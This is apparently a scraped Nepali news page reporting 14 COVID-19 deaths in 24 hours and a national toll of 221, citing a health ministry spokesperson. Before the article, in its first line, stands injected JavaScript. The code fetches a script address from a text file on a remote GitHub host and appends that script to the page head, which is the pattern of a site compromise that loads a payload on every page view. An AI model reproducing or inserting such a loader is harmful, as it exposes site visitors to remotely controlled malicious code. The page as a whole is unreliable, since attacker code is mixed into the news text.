;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
भदौ १४,
काठमाडौं । नेपालमा वितेको २४ घण्टामा १४ जनाको कोरोना भाइरस संक्रमणका कारण ज्यान गएको छ । आइतबार ४ जना महिला सहित १० जना पुरुषको कोरोनाको कारण ज्यान गएको स्वास्थ्य तथा जनसंख्या मन्त्रालयका प्रवक्ता डा. जागेश्वार गौतमले जानकारी दिए ।
योसंगै मृतकको संख्ता २ सय २१ पुगेको छ । file Photo
फेसबुक प्रतिक्रियाहरु